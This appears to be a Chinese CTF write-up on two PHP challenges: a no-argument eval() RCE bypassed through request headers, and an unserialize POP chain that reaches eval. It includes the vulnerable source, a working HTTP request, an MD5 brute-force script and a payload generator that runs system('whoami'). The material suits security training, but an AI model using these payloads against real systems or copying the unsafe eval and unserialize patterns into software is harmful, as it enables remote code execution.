rce
<?php
echo "get只接受code欧,flag在上一级目录<br>";
$filename = __FILE__;
highlight_file($filename);
if(isset($_GET['code'])){
    // Denylist: rejects input that names session_id( or readfile( (case-insensitive).
    if (!preg_match('/session_id\(|readfile\(/i', $_GET['code'])) {
        // "No-parameter" filter: strips nested calls of the shape name(name(...)) that carry
        // no arguments and accepts only when nothing but the trailing ';' is left. It checks
        // the shape of the input, not which functions are called, so a chain of argument-less
        // built-ins (as in the writeup below) passes. Passing NULL as the replacement is
        // deprecated from PHP 8.1 (a string is expected).
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['code'])) {
            @eval($_GET['code']);   // the sink; @ hides any error raised by the evaluated code
        }
    } else{
        die("不让用session欧,readfile也不行");
    }
}
?>
无参 RCE，过滤了 readfile 和 session_id 方法，我用的是这个：
GET /1.php?code=eval(next(getallheaders())); HTTP/1.1
Host: 172.28.13.107
Priority: u=0, i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: system('whoami');
比赛的时候不知道是不是 Apache；诶，这个方法只能用于 Apache。
用 get_define_class 也行，这个是通用的。
unserialize
<?php
# source
highlight_file(__FILE__);
error_reporting(0);
// Gadget classes. Only AAA, GGG and EEE are on the chain this writeup uses
// (AAA::__destruct -> AAA::__toString -> GGG::__invoke -> EEE::__get).
class AAA{
    public $aear;
    public $string;
    public function __construct($a){
        $this -> aear = $a;
    }
    // Entry point of the chain: echoing an object stored in $aear invokes its __toString().
    function __destruct() {
        echo $this -> aear;
    }
    // Calls whatever is stored in $string; an object with __invoke() (GGG) is callable.
    public function __toString() {
        $new = $this -> string;
        return $new();
    }
}
// Not used by the chain in this writeup.
class BBB {
    private $pop;
    public function __construct($string) {
        $this -> pop = $string;
    }
    // Reads the property named $value, then calls its element keyed by that same name.
    public function __get($value) {
        $var = $this -> $value;
        $var[$value]();
    }
}
// Not used by the chain in this writeup.
class DDD{
    public $bag;
    public $magazine;
    public function __toString() {
        $length = @$this -> bag -> add();   // @ hides the error when $bag has no add()
        return $length;
    }
    public function __set($arg1,$arg2) {
        if($this -> magazine -> tower) {
            echo "really??";
        }
    }
}
class EEE{
    public $d=array();
    public $e;
    public $f;
    // The eval() sink. Reached when GGG::__invoke reads $green->pen on an EEE
    // instance: EEE declares no pen property, so __get fires.
    public function __get($arg1){
        $this->d[$this->e]=1;
        // The condition tests the value of the assignment expression, not $d itself.
        // The writeup's bypass gives $d a non-array value (NAN) so that this evaluates
        // falsy; how PHP treats an index write into a scalar differs between versions,
        // so confirm against the target runtime.
        if ($this->d[]=1){
            echo 'nononononnnn!!!';
        }
        else{
            eval($this->f);   // $f is attacker-controlled: it is restored by unserialize()
        }
    }
}
// Not used by the chain in this writeup.
class FFF{
    protected $cookie;
    protected function delete() {
        return $this -> cookie;
    }
    public function __call($func, $args) {
        echo 'hahahhhh';
        call_user_func([$this, $func."haha"], $args);
    }
}
class GGG{
    public $green;
    public $book;
    // Loose comparison: a 32-character hex digest is compared with the int 666 with ==,
    // so a digest whose leading characters convert to 666 passes (the writeup brute-forces $book).
    public function __invoke(){
        if(md5(md5($this -> book)) == 666) {
            return $this -> green -> pen;   // property read on $green -> EEE::__get()
        }
    }
}
// Untrusted input reaches unserialize(); every class above with magic methods is a
// gadget. json_decode() on a data-only format is the safe replacement for this.
if(isset($_POST['UP'])) {
    unserialize($_POST['UP']);
}
调用链为
AAA::__destruct()->AAA::__toString()->GGG::__invoke()->EEE::__get()
但是最后一个地方有一个判断，就是：
if ($this->d[]=1){ echo 'nononononnnn!!!'; }
要让这个判断为 false，让 d 为 NAN 即可。我们做个实验：
再写个 MD5 爆破脚本：
import hashlib
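def crack(pre, limit=999999):
    """Find integers whose double-MD5 hex digest starts with ``pre``.

    For each ``i`` in ``range(0, limit)`` the hex digest of ``md5(md5(str(i)))``
    is computed and ``i`` is printed (as the original script did) when the first
    three characters of that digest equal ``str(pre)``.  Because the comparison
    is against ``[0:3]``, a ``pre`` whose ``str()`` is not exactly three
    characters long can never match.

    Args:
        pre: the prefix to look for; compared as ``str(pre)``.
        limit: exclusive upper bound of the search.  Defaults to 999999, the
            range the original hard-coded.

    Returns:
        list[int]: every matching ``i`` in ascending order (empty if none).
    """
    target = str(pre)
    hits = []
    for i in range(0, limit):
        inner = hashlib.md5(str(i).encode("UTF-8")).hexdigest()
        outer = hashlib.md5(inner.encode("UTF-8")).hexdigest()
        if outer[0:3] == target:
            print(i)
            hits.append(i)
    return hits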
# Search the default range for digests matching the challenge's loose `== 666` check.
crack(pre="666")
<?php
# 源码
highlight_file(__FILE__);   // identical to the challenge's first lines; prints this script's own source ahead of the payload
error_reporting(0);         // silences notices/warnings while the payload is built
// Property-only stand-ins for the challenge classes: same names and visibility as
// the originals, but the magic methods are omitted, so none of them can run while
// the payload is being serialized here.
class AAA
{
    public $aear;
    public $string;

    public function __construct($a)
    {
        $this->aear = $a;
    }
}

class BBB
{
    // private: serialized with a NUL-delimited name, presumably why the output is urlencode()d
    private $pop;
}

class DDD
{
    public $bag;
    public $magazine;
}

class EEE
{
    public $d = [];
    public $e;
    public $f;
}

class FFF
{
    protected $cookie;
}
class GGG
{
    public $green;
    public $book;
}

// Innermost gadget first: the EEE instance that ends the chain.
$eee = new EEE();
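// Fill the gadgets inner-to-outer: EEE (eval sink) -> GGG (__invoke) -> AAA (__toString) -> AAA (__destruct).
$eee->d = NAN;                  // the author's bypass for `if ($this->d[] = 1)` in EEE::__get (see the note above);
                                // NOTE(review): index writes into a scalar behave differently across PHP versions — confirm on the target
$eee->e = NAN;
$eee->f = "system('whoami');";  // string handed to eval() inside EEE::__get

$ggg = new GGG();
$ggg->book = '213';             // value whose md5(md5()) must satisfy the loose `== 666` comparison in GGG::__invoke
$ggg->green = $eee;             // GGG::__invoke returns $green->pen, which fires EEE::__get

// The stub constructor declares a required $a. On PHP 7.1+ `new AAA()` throws
// ArgumentCountError, so pass null explicitly; $aear serializes as N either way.
$inner = new AAA(null);
$inner->string = $ggg;          // AAA::__toString calls $string(), i.e. GGG::__invoke

$outer = new AAA($inner);       // AAA::__destruct echoes $aear, which triggers $inner->__toString()
echo urlencode(serialize($outer));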